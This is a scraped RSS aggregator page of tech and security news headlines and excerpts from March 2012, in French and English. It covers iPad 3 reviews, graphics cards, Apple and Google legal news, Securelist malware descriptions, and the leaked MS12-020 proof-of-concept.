Seagate travaille à une technologie de stockage des données, HAMR, en remplacement de l’enregistrement perpendiculaire classique (PMR). A la clé une plus forte densité des données et des disques de 3,5 pouces qui pourraient offrir, en théorie, jusqu’à 60 To de capacité de stockage.
Channel Image12:07 Dix associations de consommateurs exigent qu'Apple respecte la loi sur la garantie» ZDNet News
Apple a déjà été lourdement condamné en Italie pour avoir imposé une garantie d'un an alors que la loi la fixe à deux.
Channel Image11:03 Bataille contre le téléchargement direct : Google apporte son soutien à Hotfile» ZDNet News
Galvanisés par la fermeture de MegaUpload, les studios américains réclament la fermeture du service Hotfile. Mais pour Google, une telle sanction avant jugement serait contraire à la loi DMCA, dont bénéficie Hotfile, au même titre que youTube ou Wikipedia.
Channel Image10:42 Le poids économique d'Internet dans le monde a presque doublé en un an» ZDNet News
Selon une étude du Boston Consulting Group, la valeur économique de la Toile est passée de 2300 milliards de dollars en 2010 à 4200 milliards un an plus tard.
Channel Image10:24 Vers des disques de 60 To chez Seagate» HardWare.fr
Channel Image09:29 Kernel 3.3 : Linux et Android se rapprochent» ZDNet News
Avec la sortie de la version 3.3 du noyau Linux, c’est le début d’un rapprochement, progressif, entre Linux et Android, avec pour objectif de bénéficier des fonctionnalités des deux plates-formes.
Channel Image08:55 Twitter et Facebook pas des remèdes pour la presse en ligne» ZDNet News
Les recommandations sur les réseaux sociaux sont une source encore faible de trafic (9%) pour les sites d’actualités, contrairement aux visites directes (36%) et aux moteurs (32%).
Channel Image08:48 Nouvel iPad : 3 millions d’unités vendues» ZDNet News
Apple parle du meilleur lancement jamais réalisé pour sa tablette, disponible dans une douzaine de pays. C'est un million de plus que les ventes de l'iPad 2 lors du premier week-end de commercialisation.
Channel Image08:00 Nouveaux noms de domaines : pas un coup de pouce au référencement» ZDNet News
Disposer d’un site avec une nouvelle extension de nom de domaine (gTLD), comme .assurance ou .tablette, ne sera pas un levier pour obtenir un meilleur référencement sur le moteur de recherche prévient Matt Cutts de Google.
Channel Image07:40 Windows 8 : lancement en octobre avec 3 tablettes ARM» ZDNet News
Selon les informations de Bloomberg, Microsoft prépare la sortie de son OS pour le début du 4èmetrimestre avec le lancement concomitant de machines X86 et ARM.
Channel Image06:40 Estonie : la justice pourrait bientôt envoyer des assignations via Facebook et Twitter» ZDNet News
Le Parlement estonien s’apprête à débattre d’un projet de loi destiné à faciliter le cours de la justice en permettant d’envoyer des assignations par courriel, Facebook ou Twitter.
Channel Image06:00 Fedora 16 And GNOME Shell: Tested And Reviewed» Reviews Tom's Hardware US
Fedora 16 And GNOME Shell: Tested And ReviewedUbuntu and Mint don't want it; Linus called it an “unholy mess.” While most other distros are passing up or postponing GNOME Shell, Fedora is full steam ahead. Does Red Hat know something the rest of us don't? Or is GNOME 3 really as bad as everyone says?
Channel Image04:08 ISC StormCast for Tuesday, March 20th 2012 http://isc.sans.edu/podcastdetail.html?id=2410, (Tue, Mar 20th)» SANS Internet Storm Center, InfoCON: green
...(more)...
Channel Image02:03 A Reminder: Private Key Security, (Tue, Mar 20th)» SANS Internet Storm Center, InfoCON: green
One of the special features of Stuxnet was the use of a stolen private key to sign drivers. This mad ...(more)...
Channel Image01:05 British Silicons plot tech future» BBC News - Technology
The start-up clusters that could create tomorrow's tech giants
Channel Image00:00 nVidia GeForce (20/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour linux
Optimisez vos jeux et vos configurations matérielles


Channel Image00:00 Oolite (20/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour linux
Jeu de combat spatial en 3D inspiré d'Elite


Channel Image00:00 Firestarter (20/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour linux
Protégez votre système Linux des intrusions


Channel Image00:00 Bubble Shooter (20/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour linux
Faites exploser les bulles avant qu'elles n'envahissent le plateau de jeu !


Channel Image00:00 AcetoneISO (20/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour linux
Logiciel à tout faire pour monter des images disques, extraire et convertir des vidéos et crypter des média optiques


Channel Image00:00 ATI Catalyst (20/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour linux
Une suite logicielle et le pilote pour les cartes ATI Radeon


Channel Image00:00 AMD Catalyst (20/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour linux
Optimisez vos jeux et vos configurations matériels


Mon 19 March, 2012

Channel Image23:06 Tested: Battery Life on the new iPad» AnandTech

Hot on the heels of our Retina Display analysis we have some more data for you: battery life of the new iPad. The chart above is our revamped web browser battery life test that we introduced in Part 2 of our Eee Pad Transformer Prime review. Despite the huge increase in battery capacity, battery life seems to be a bit lower than the iPad 2. The drop isn't huge but it does echo what we've seen in our subjective testing: the new iPad doesn't appear to last as long as the old one.

The drop on LTE is in line with what Apple claims you should expect: about an hour less than on WiFi. 

Now for the killer. If you have an iPad on Verizon's LTE network and use it as a personal hotspot (not currently possible on the AT&T version), it will last you roughly 25.3 hours on a single charge. Obviously that's with the display turned off, but with a 42.5Wh battery driving Qualcomm's MDM9600 you get tons of life out of the new iPad as a personal hotspot.

More in our upcoming review...

Channel Image22:49 The new iPad: Retina Display Analysis» AnandTech

We're hard at work on our review on the new iPad but with a fair bit of display analysis under our belts I thought a quick post might be in order. One of the major features of the new iPad is its 2048 x 1536 Retina Display. Apple kept the dimensions of the display the same as the previous two iPad models, but doubled the horizontal and vertical resolution resulting in a 4x increase in pixels. As display size remained unchanged, pixel density went through the roof:

Pixel Density Comparison

Read on for our analysis of Apple's Retina Display on the new iPad.

Channel Image22:09 Archos 80 and 101 G9 Turbo 1.5 GHz Available Now In US» AnandTech

Quick update, to the Archos news we've had rolling lately. US buyers can now pick up the Archos G9 Turbo line of tablets at their promised 1.5 GHz; the US store is now offering the 8" and 10.1" variants for $269 and $329 respectively, with 8GB of NAND on board. These TI OMAP 4460 powered tablets will be our first chance to see what kind of performance can be wrung out of OMAP 4 when pushed to their fastest clock speed. It'll also be curious to see how this new speed affects battery life. The 101 G9 Turbo is also available for $369 with a 250GB HDD, giving you more media storage than you find on some notebooks these days. The specs on this line are impressive when you consider just how much less these tablets are than their competition, many of whom still don't have Android 4.0. We'll have a full review as soon as we can, in the meanwhile prospective buyers should follow the links to the Archos store. 

Source: Archos (1), (2)

Channel Image20:33 Avi Rubin on Computer Security» Schneier on Security
Avi Rubin has a TEDx talk on hacking various computer devices: medical devices, automobiles, police radios, smart phones, etc....
Channel Image19:26 Google France dans le collimateur de l'administration fiscale» ZDNet News
L'Express révèle que la direction nationale d'enquêtes fiscales a effectué une perquisition dans les bureaux de Google France en juin dernier et saisit des documents qui pourraient révéler une fraude fiscale.
Channel Image17:47 SEO : elle est où la liste des pénalités Google ?» Denis Szalkowski Formateur Consultant
Quand le monde du SEO se lasse aller dans le bizarre !Depuis que Matt Cutts vient de nous parler de sur-optimisation, personne - strictement personne - n'est fichu de nous produire une liste exhaustive des raisons des pénalités que nous encourons pour nos sites. Du coup, ne sachant que dire ou que faire, certains se risquent sur le bizarre !

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image16:43 Nouvelle version des Office Web Apps cet été ?» ZDNet News
A l’occasion du lancement de la version Beta d’Office 15, Microsoft devrait dévoiler une nouvelle mouture des clients Web des applications Office, les Office Web Apps.
Channel Image16:16 Trojan-Downloader.Win32.Agent.ecwi» Securelist / Descriptions
Once launched, the Trojan downloads files from the following URL addresses: http://89.***.229/dm/files/aukhrfbv.exe http://89.***.229/dm/files/hftywmn.exe http://89.***.229/dm/files/knwtxtk.exe http...
Channel Image16:12 Trojan-Downloader.Win32.Agent.bgol» Securelist / Descriptions
This Trojan installs other programs to the victim machine without the knowledge or consent of the user. It is a Windows application (PE EXE file). It is 23 198 bytes in size. It is packed using UPack....
Channel Image16:07 Trojan-Downloader.VBS.Agent.aae» Securelist / Descriptions
After launching, the Trojan creates the following directory: <my_doc<\<rnd1> where: <rnd1> is a random sequence of letters, for example "QKQLSXOOIBPAGNENGI" or...
Channel Image15:46 L’iPad 3 plus coûteux (mais pas trop) à produire pour Apple» ZDNet News
Les évolutions matérielles apportées par Apple à l’iPad 3 se traduisent par une augmentation du coût de production de la tablette selon les calculs d'IHS iSuppli. L’iPad 4G+32 Go revient ainsi à environ 375 dollars. La tablette reste cependant un produit très rentable pour Apple.
Channel Image15:33 Apple va verser 2,65 $ de dividende et racheter 10 milliards $ de ses titres» ZDNet News
Pour la première fois depuis 16 ans, Apple va verser 2,65 $ de dividende par action à compter de quatrième trimestre fiscal et engage un plan sur trois ans de rachat de ses titres pour 10 milliards $.
Channel Image15:29 Un cache L4 pour Haswell ?» HardWare.fr
Channel Image14:42 The mystery of Duqu Framework solved» Securelist / Blog

The Quest for Identification

In my previous blogpost about the Duqu Framework, I described one of the biggest remaining mysteries about Duqu - the oddities of the C&C communications module which appears to have been written in a different language than the rest of the Duqu code. As technical experts, we found this question very interesting and puzzling and we wanted to share it with the community.

The feedback we received exceeded our wildest expectations. We got more than 200 comments and 60+ e-mail messages with suggestions about possible languages and frameworks that could have been used for generating the Duqu Framework code. We would like to say a big ‘Thank you!’ to everyone who participated in this quest to help us identify the mysterious code.

Let us review the most popular suggestions we got from you:

  • Variants of LISP
  • Forth
  • Erlang
  • Google Go
  • Delphi
  • OO C
  • Old compilers for C++ and other languages
Channel Image14:30 Disponibilité des Radeon HD 7870 & 7850» HardWare.fr
Channel Image14:25 Réseaux sociaux : la Cnil veut que vous réfléchissiez avant de cliquer» ZDNet News
La Commission nationale Informatique et Libertés lance une campagne virale afin de sensibiliser les jeunes et leurs parents aux bonnes pratiques sur les réseaux sociaux.
Channel Image14:00 The Retail Radeon HD 7870 Review: HIS 7870 IceQ Turbo & PowerColor PCS+ HD7870» AnandTech

Two weeks ago AMD officially unveiled the Radeon HD 7800 series. Composed of the Radeon HD 7870 GHz Edition and Radeon HD 7850, AMD broke from their earlier protocol with the 7700 and 7900 series and unveiled the cards ahead of their actual launch in order to beat CeBIT and GDC. The result was a pair of impressive – if expensive – cards that cemented AMD’s control of the high-end video card market. Unfortunately because of this early unveiling you couldn’t buy one at the time.

Those two weeks have now come and gone, and the 7800 series has finally been released for sale. Because AMD’s partners have largely passed on AMD’s reference design for the 7870 series we wanted to take a look at what the actual retail cards would be like; with almost everyone using a custom cooler and many partners using factory overclocks, there’s a great deal of variation between cards. To that end HIS and PowerColor have sent over their top 7870 cards, the HIS 7870 IceQ Turbo and the PowerColor PCS+ HD7870. How do these retail cards stack up compared to our reference 7870, and what kind of impact do their factory overclocks bring? Let’s find out.

Channel Image13:54 Fake or hijacked Facebook accounts used in scams to steal money are on the rise» Securelist / Blog

Sweden recently experienced a large banking scam where over 1.2 million Swedish kronor (about $177,800) were stolen by infecting the computers of multiple victims. The attackers used a Trojan which was sent to the victims and, once installed, allowed the attackers to gain access to the infected computers. Luckily these guys were caught and sentenced to time in jail, but it took a while to investigate since over 10 people were involved in this scam.

It's possible that these attacks are no longer as successful as the bad guys would like, because we are now seeing them use other methods to find and exploit new victims. For quite some time now we have seen how hijacked Facebook accounts have been used to lure the friends of whose account has been hijacked to do everything from click on malicious links to transfer money to the cybercriminals’ bank accounts.

Please note that this is not a new scam - it has been out there for quite some time. But what we are now seeing is the use of stolen/hijacked accounts, or fake accounts, becoming very common on Facebook. So common, in fact, that there are companies creating fake accounts and then selling access to them to other cybercriminals. As you might expect, the more friends these accounts have, the more expensive they are, because they can be used to reach more people.

The problem here is not just technical - it’s primarily a social problem. We use Facebook to expand our circle of friends. We can easily have several hundred friends on Facebook, while we in real life we may only have 50. This could be a problem because some of the security and privacy settings in Facebook only apply in your interactions with people who you are not friends with. Your friends, on the other hand, have full access to all the information about you.

Channel Image12:40 Femmes dans le numérique : des écarts de salaires importants avec les hommes» ZDNet News
Selon une étude de Markess, les femmes sont sous représentées dans les entreprises du numérique et pâtissent d’écarts de rémunération avec les hommes allant de 6% à 37% pour les postes de cadres dirigeants.
Channel Image12:38 Australian Security Theater» Schneier on Security
I like the quote at the end of this excerpt: Aviation officials have questioned the need for such a strong permanent police presence at airports, suggesting they were there simply "to make the government look tough on terror". One senior executive said in his experience, the officers were expensive window-dressing. "When you add the body scanners, the ritual humiliation of...
Channel Image12:13 Les industriels du numérique se regroupent dans un collectif pour se faire entendre» ZDNet News
Insatisfaites de la campagne électorale qui néglige les questions d’économie numérique, plusieurs grandes organisations du secteur (Fevad, FFT, Afdel, Syntec, Crip, EuroCloud…) se regroupent dans un collectif dans l’espoir de mieux se faire entendre des candidats à la présidentielle.
Channel Image12:12 La justice allemande exige que Rapidshare contrôle les fichiers hébergés» ZDNet News
Le service devra contrôler en amont les fichiers uploadés afin de vérifier qu'ils ne sont pas piratés. Une décision qui contredit un précédent jugement favorable à Rapidshare.
Channel Image10:30 Faille de Windows : des données fuitent sur Internet» ZDNet News
Une fuite a permis la divulgation sur Internet, avant la publication d’un correctif, de données relatives à une faille de sécurité affectant l’ensemble des versions de Windows. Microsoft pourrait être à l’origine de cette fuite.
Channel Image06:25 Suivre les chaînes Youtube de l’AFP et d’autres agences de presse par RSS» Denis Szalkowski Formateur Consultant
Les flux Rss de la chaîne Youtube de l'AFPLes agences de presse françaises AFP et CAPA ont fait le choix d'héberger leurs vidéos sur Youtube. Grâce à son API 2.0, vous pourrez suivre les contenus produits dans votre agrégateur favori !

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image06:00 Apple's iPad 3, Part 1: The Complete Retina Display And A5X Review» Reviews Tom's Hardware US
Apple's iPad 3, Part 1: The Complete Retina Display And A5X ReviewApple's third-generation iPad hit the market last week, and we're impressed. Sporting a new 9.7" Retina display, the iPad 3 sports the most gorgeous display that we've seen on a tablet. Join us for the first part of our iPad 3 coverage.
Channel Image01:57 ISC StormCast for Monday, March 19th 2012 http://isc.sans.edu/podcastdetail.html?id=2404, (Mon, Mar 19th)» SANS Internet Storm Center, InfoCON: green
...(more)...
Channel Image01:01 Introduction to the autotools (autoconf, automake, libtool)» David A. Wheeler's Blog

I’ve recently posted a video titled “Introduction to the autotools (autoconf, automake, and libtool)”. If you develop software, you might find this video useful. So, here’s a little background on it, for those who are interested.

The “autotools” are a set of programs for software developers that include at least autoconf, automake, and libtool. The autotools make it easier to create or distribute source code that (1) portably and automatically builds, (2) follows common build conventions (such as DESTDIR), and (3) provides automated dependency generation if you’re using C or C++. They’re primarily intended for Unix-like systems, but they can be used to build programs for Microsoft Windows too.

The autotools are not the only way to create source code releases that are easily built and packaged. Common and reasonable alternatives, depending on your circumstances, include Cmake, Apache Ant, and Apache Maven. But the autotools are one of the most widely-used such tools, especially for programs that use C or C++ (though they’re not limited to that). Even if you choose to not use them for projects you control, if you are a software developer, you are likely to encounter the autotools in programs you use or might want to modify.

Years ago, the autotools were hard for developers to use and they had lousy documentation. The autotools have significantly improved over the years. Unfortunately, there’s a lot of really obsolete documentation, along with a lot of obsolete complaints about autotools, and it’s a little hard to get started with them (in part due to all this obsolete documentation).

So, I have created a little video introduction at http://www.dwheeler.com/autotools that I hope will give people a hand. You can also view the video via YouTube (I had to split it into parts) as Introduction to the autotools, part 1, Introduction to the autotools, part 2, and Introduction to the autotools, part 3.

The entire video was created using free/libre / open source software (FLOSS) tools. I am releasing it in the royalty-free webm video format, under the Creative Commons CC-BY-SA license. I am posting it to my personal site using the HTML5 video tag, which should make it easy to use. Firefox and Chrome users can see it immediately; IE9 users can see it once they install a free webm driver. I tried to make sure that the audio was more than loud enough to hear, the terminal text was large enough to read, and that the quality of both is high; a video that cannot be seen or heard is rediculous.

This video tutorial emphasizes how to use the various autotools pieces together, instead of treating them as independent components, since that’s how most people will want to use them. I used a combination of slides (with some animations) and the command line to help make it clear. I even walk through some examples, showing how to do some things step by step (including using git with the autotools). This tutorial gives simple quoting rules that will prevent lots of mistakes, explains how to correctly create the “m4” subdirectory (which is recommended but not fully explained in many places), and discusses why and how to use a non-recursive make. It is merely an introduction, but hopefully it will be enough to help people get started if they want to use the autotools.

Channel Image00:00 eSpeak (19/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour linux
Logiciel de "text-to-speech" open source


Channel Image00:00 TeamSpeak - Serveur (19/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour linux
Administrer et d'héberger les conversations audio des clients Teamspeak


Channel Image00:00 Renoise (19/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour linux
Plateforme d'enregistrement musical


Channel Image00:00 Google Chrome 18 Beta (19/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour linux
La version beta du navigateur de Google


Channel Image00:00 Conqu (19/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour linux
Gérez vos tâches et emplois du temps de manière optimale


Channel Image00:00 AuctionSieve (19/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour linux
Filtre les enchères d'eBay pour faire les meilleures affaires
Channel Image00:00 Arista Transcoder (19/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour linux
Convertissez vos vidéos vers d'autres formats compatibles avec vos appareils mobiles


Sun 18 March, 2012

Channel Image10:00 This Just In: PowerColor PCS+ HD7870» AnandTech

Though AMD announced the Radeon HD 7800 series nearly two weeks ago, it won’t be until Monday that the cards officially go on sale. While we’re still at work on our full launch article, our first retail card, PowerColor’s PCS+ HD7870, recently arrived and we’ve just finished putting it through its paces.

The PCS+ HD7870 is fairly typical of what will be launching; it’s a factory overclocked card with a heatpipe based open air cooler. PowerColor has pushed the card to 1100MHz core, 4.9GHz memory, representing a 100MHz (10%) overclock and a much more mild 100MHz (2%) memory overclock. Given the very high overclockability we’ve seen in the entire Radeon HD 7000 series, PowerColor is one of the partners looking to take advantage of that headroom to stand out from the pack.

We’ll have the full details on Monday, but for the time being we wanted to share a couple of numbers.

Compared to the reference 7870 The PCS+ HD7870 is faster and quieter at the same time, the latter of which is largely a result of PowerColor using an open air cooler as opposed to a blower as in AMD’s reference design. The 100MHz overclock adds a fair bit of performance to the PCS+ 7870, and for AMD’s partners this is a big deal as allows them to put more space between their factory overclocked models and stock models as compared to the less overclockable 6000 series.

As far as construction goes the PCS+ 7870 is a rather typical semi-custom 7870. PowerColor is using AMD’s PCB along with their own aluminum heatpipe cooler. As we speculated in our 7870 review, partners are using the second DVI header on the PCB, with PowerColor using a stacked DVI design here to offer a second SL-DVI port.

Finally, how’s overclocking? We hit 1150MHz core on our reference 7870. With PowerColor already binning chips for their PCS+ 7870 we landed a chip that could do a full 1200MHz, a full 20% over the reference 7870 and 9% over PowerColor’s factory overclock. And like the reference 7870 this is all on stock voltage – we haven’t even touched overvolting yet.

But what does 1200MHz do for a 7870? For that you’ll just have to check in on Monday when we look at our full collection of retail Radeon HD 7870 cards.

Channel Image06:44 Quand Google Analytics ne voit que 10% du trafic des sites !» Denis Szalkowski Formateur Consultant
Google Analytics, un outil dédié aux gourous malvoyants de l'Internet ?Quand je lis toute cette littérature dithyrambique, à la limite de la logorrhée, autour de Google Analytics, il y aurait franchement de quoi pleurer de rire, vous ne trouvez pas ? Cet outil si performant peine à voir plus de 10% du trafic de nos sites. Certes, c'est tout de même mieux qu'un institut de sondage !

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Sat 17 March, 2012

Channel Image14:42 Rosewill Hive 550W» AnandTech

Rosewill sent us their newest model Hive with 550W. The rated power makes these models good for most common GPUs as well as powerful CPUs. Features such as 80 Plus Bronze certification and modular cables are quite common these days, but such characteristics say little about how good a PSU really is. What about the internal design and components for example? Who built this PSU? On the following pages we will meet an old acquaintance with a new look and see if it's capable of keeping pace with the times.

Channel Image10:33 Bravo et merci, à toi, Pierre-Yves !» Denis Szalkowski Formateur Consultant
Je voulais te féliciter pour l'obtention de ton diplôme d'ingénieur CNAM. Je voulais aussi te remercier pour ta proposition de participer au contenu de Planet Libre. C'est, venant de toi, l'un des plus beaux signes de reconnaissance que j'ai eu l'occasion de recevoir au cours de ma petite existence.

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image09:59 Configuration de Privoxy et Tor pour le scrapping» Denis Szalkowski Formateur Consultant
Configuration de Privoxy et Tor pour le scrappingCouplé à Tor, un réseau de serveurs vous garantissant l'anonymat sur Internet, Privoxy vous permettra de vous adonner, en toute sérénité, à vos activités de scrapping. Cet article vous fournit des exemples de code en PHP qui vous permettront de récupérer les informations dans les pages en toute discrétion. ;+)

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Fri 16 March, 2012

Channel Image22:57 Friday Squid Blogging: Squid-Shaped USB Drive» Schneier on Security
It looks great. As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered....
Channel Image22:29 Apple's A5X Floorplan» AnandTech

Apple's A5X SoC

Today has been pretty exciting. Not only did we confirm the die size of Apple's A5X SoC (162.94mm^2) but we also found out that it's still built on Samsung's 45nm LP process. Now, courtesy of UBM TechInsights, we have the first annotated floorplan of the A5X (pictured above).

pple's A5 SoC

You can see the two CPU cores (ARM Cortex A9s) as well as the additional two GPU cores (PowerVR SGX543MP4) compared to the A5 (pictured below). Note the increase in DDR interfaces, although it's unclear whether we're looking at 4x16 or 4x32-bit interfaces. It's quite possible that it's the former. Also note that Apple has moved the DDR interfaces next to the GPU cores, compared to the CPU-adjacent design in the A5. It's clear who is the biggest bandwidth consumer in this chip.

Gallery: Apple's A5X Floorplan

Channel Image19:49 L'Apple iPad 3 en test : écran, CPU, GPU.../LesNum» HardWare.fr
Channel Image19:15 BitCoin Security Musings» Schneier on Security
Jon Callas talks about BitCoin's security model, and how susceptible it would be to a Goldfinger-style attack (destroy everyone else's BitCoins)....
Channel Image18:59 Apple A5X Die Size Measured: 162.94mm^2, Samsung 45nm LP Confirmed» AnandTech

Contrary to what we thought yesterday based on visual estimation of the A5X die, Chipworks has (presumably) measured the actual die itself: 162.94mm^2. While the A5 was big, this is absolutely huge for a mobile SoC. The table below puts it in perspective.

CPU Specification Comparison
CPU Manufacturing Process Cores Transistor Count Die Size
Apple A5X 45nm? 2 ? 163mm2
Apple A5 45nm 2 ? 122mm2
Intel Sandy Bridge 4C 32nm 4 995M 216mm2
Intel Sandy Bridge 2C (GT1) 32nm 2 504M 131mm2
Intel Sandy Bridge 2C (GT2) 32nm 2 624M 149mm2
NVIDIA Tegra 3 40nm 4+1 ? ~80mm2
NVIDIA Tegra 2 40nm 2 ? 49mm2
 
The PowerVR SGX 543MP2 in Apple's A5 takes up just under 30% of the SoC's 122mm^2 die size, or around 36.6mm^2 just for the GPU. Double the number of GPU cores as Apple did with the A5X and you're looking at a final die size of around 160mm^2, which is exactly what Chipworks came up with in their measurement.

 
Update: Chipworks confirmed the A5X is still built on Samsung's 45nm LP process. You can see a cross-section of the silicon above. According to Chipworks' analysis, the A5X features 9 metal layers.
 
Note that this is around 2x the size of NVIDIA's Tegra 3. It's no surprise Apple's GPU is faster, it's spending a lot more money than NVIDIA to deliver that performance. From what I hear, NVIDIA's Wayne SoC will finally show what the GPU company is made of. The only issue is that when Wayne shows up, a Rogue based A6 is fairly likely. The mobile GPU wars are going to get very exciting in 2013.
 
Image Courtesy iFixit
 
Thanks to @anexanhume for the tip!

Channel Image18:41 Update to this Month's Patch Tuesday Post on MS12-020/CVE-2012-0002» Securelist / Blog

The twitter infosec sphere last night and the blogosphere this morning is in a bit of a frenzy about the public leak of a DoS PoC targeting CVE-2012-0002, the RDP pre-auth remote. This vulnerability was highlighted at our previous Securelist post on this month's patch Tuesday "Patch Tuesday March 2012 - Remote Desktop Pre-Auth Ring0 Use-After-Free RCE!". First off, patch now. Now. If you can't, use the mitigation tool that Microsoft is offering - the tradeoff between requiring network authentication and the fairly high risk of RCE in the next couple of weeks is worth it. You can see the list of related links on the side of this page, one was included for MS12-020.

Some interesting additional information has surfaced about the vulnerability, including the fact that the bug was generated in May of 2011 and "reported to Microsoft by ZDI/TippingPoint in August 2011". The researcher, Luigi Ariemma, discusses that this work wasn't disclosed by him (often, he fully discloses his work). After some careful investigation of the poorly coded "rdpclient.exe" posted online in Chinese forums, he found that it was a cheap replica of the unique code he provided to ZDI and in turn, Microsoft, when privately reporting the bug. This is bad. And already, researchers with connections to Metasploit open source exploit dev like Joshua Drake are tightening up the code, developing and sharing improved PoC. As Microsoft pointed out, confidence in the development of a reliable public exploit within 30 days is very high.

Regardless, the implications of a leak in the highly valuable MAPP program could hinder strong and important security efforts that have been built on years of large financial investment, integrity, and maturing operational and development processes. Thoughts and opinions on the leak itself can be found over at Zero Day. At the same time, I think that this event may turn out to be nothing more than a ding in the MAPP program's reputation, but it's important that this one is identified and handled properly. With the expansion of the program, an event like this one is something that certainly should have been planned for.

UPDATE: Early this afternoon over at the MSRC blog, Microsoft acknowledges that the PoC leaked on Chinese forums "appears to match the vulnerability information shared with MAPP partners", note that an RCE exploit is not publicly circulating just yet, advises patching or mitigating with the Fix-It, and initiates investigation into the disclosure.

Channel Image17:36 Bandizip - v2.0.3» ToutFr.com - Les traductions mises à jour
Bandizip est léger, rapide et gratuit
Channel Image17:24 Trojan-Downloader.Java.Agent.ft» Securelist / Descriptions
The malicious Java applet is launched from the infected HTML page. For example, this Trojan is downloaded by an exploit that is detected by Kaspersky Anti-Virus as Exploit.HTML.CVE-2010-1885.c. It is...
Channel Image17:19 Trojan.Win32.Qhost.obf» Securelist / Descriptions
This Trojan has a malicious payload. It is a Windows application (PE EXE file). It is 24 576 bytes in size. It is packed using an unknown packer. The unpacked file is approximately 48 KB in size. It...
Channel Image17:16 Trojan.Win32.KillAV.ks» Securelist / Descriptions
When launching, the Trojan performs the following actions: It force quits the following processes:...
Channel Image16:23 Archos Shipping 1.5GHz 80 G9 Turbo Across The Pond» AnandTech

UK readers have one more thing to lord over their colonial cousins. Starting today, Archos has made available the long promised Archos 80 G9 Turbo in its full 1.5 GHz glory. Positioned as relative bargains in the Android tablet space, the updated slate can be bought from the UK Archos Store for £199.98 or £239.99, in 8 GB and 16 GB models, respectively. The updated line is shipping with Ice Cream Sandwich on board, so no firmware updates when you open the box. 

As a refresher, we've been reporting on Archos G9 line for quite a while. Originally announced as the fastest Android tablets in the world, they haven't until now hit their top speeds on all models. With a TI OMAP 4460 tuned to 1.2 GHz, Archos released the first round of Turbo models in late 2011. These tablets matched the Galaxy Nexus in specs, but were still 20% below the promise. With whatever hurdles finally overcome, we're excited to explore the performance of a full speed OMAP 4460, particularly its PowerVR SGX540, which should be clocked at 384 MHz, trumping the GN's 304 MHz. Alas, this release seems to be UK and Europe only. With US pricing expected to hover around $300, we're eagerly awaiting a US release. 

Channel Image16:12 A unique ‘fileless’ bot attacks news site visitors» Securelist / Blog

In early March, we received a report from an independent researcher on mass infections of computers on a corporate network after users had visited a number of well-known Russian online information resources. The symptoms were the same in each case: the computer sent several network requests to third-party resources, after which, in some cases, several encrypted files appeared on the hard drive.

The infection mechanism used by this malware proved to be very difficult to identify. The websites used to spread the infection are hosted on different platforms and have different architectures. None of our attempts to reproduce the infections were successful. A quick analysis of KSN statistics that might help to identify the connection between compromised resources and the malicious code being distributed did not yield any results, either. However, we did manage to find something that the news sites had in common.

Channel Image15:45 Is Google confused about Android security?» Securelist / Blog

While Google is obviously trying to create a safer environment in regard to the Android operating system, some of these changes are leaving me a bit confused. I recently discovered some interesting behavior in regard to the default email client in 4.0 Ice Cream Sandwich.

It seems that if you try to download or open a zip file attachment from within the email client, Google warns of the possibility of malware:

Channel Image15:44 HTC Vivid Android 4.0 Sneaks Out For Some» AnandTech

 

The long road to Android 4.0 for US subscribers seems to be getting shorter; and for some lucky users the time has come. AT&T's HTC Vivid was one of their first LTE devices, and made the list of HTC devices that would be receiving Ice Cream Sandwich. Typically these OTA updates are pushed after extensive testing and to a handful of devices at first. However, as first reported on Android Central, some owners were able to pull the update by dialing *#*#682#*#*. The update includes HTC's updated Sense 3.6 skin, which seems a little less intrusive than their prior iterations and does open up its Beats Audio feature to third party applications for the first time. 

As a Gingerbread device the VIvid's no slouch; featuring Qualcomm's S3 APQ8060 (1.2 GHz dual-core Snapdragon), paired with the MDM9600 for connectivity, and 1GB of RAM, performance was on par with other phones of that generation. With this update we will have our first chance to directly compare performance on ICS between two similar SoCs (TI's OMAP 4xxx and Qualcomm's S3). No doubt a lot of time has been spent by both Qualcomm and HTC in optimizing the build for the hardware, and hopefully that work will be pushed to more AT&T users in the coming weeks. 

Interested Vivid owners should try the update code, users on XDA are reporting varying success; if your phone updates, please post performance results as you get them. We'll update the post if we learn more. 

Channel Image15:10 HIS 7970 IceQ X2 et 7950 IceQ» HardWare.fr
Channel Image14:21 MSI R7970 Lightning» HardWare.fr
Channel Image13:11 VIDEO: SXSW: As 'Pinteresting' as ever» BBC News - Technology
The rise of Pinterest and other tools to curate content at the Austin event.
Channel Image13:09 Non-Lethal Heat Ray» Schneier on Security
The U.S. military has a non-lethal heat ray. No details on what "non-lethal" means in this context....
Channel Image12:07 Sapphire Radeon HD 7970 OC» HardWare.fr
Channel Image10:13 Recherche avancée dans les moteurs» Denis Szalkowski Formateur Consultant
Je vous propose un tour d'horizon sur les opérateurs de recherche avancés, utilisés dans les principaux moteurs de recherche.

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image07:51 cURL : en route vers le scrapping» Denis Szalkowski Formateur Consultant
cURL, l'un des outils du BlackhatL'utilisation de cURL est un des préalables si vous souhaitez développer - par vous-même - des outils de scrapping. La classe PHP que je viens de développer sous licence GPL vous permettra de rester extrêmement discret dans la récupération de contenus et de liens.

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image06:15 HP ZR2740w - High Resolution IPS that Doesn't Break the Bank» AnandTech

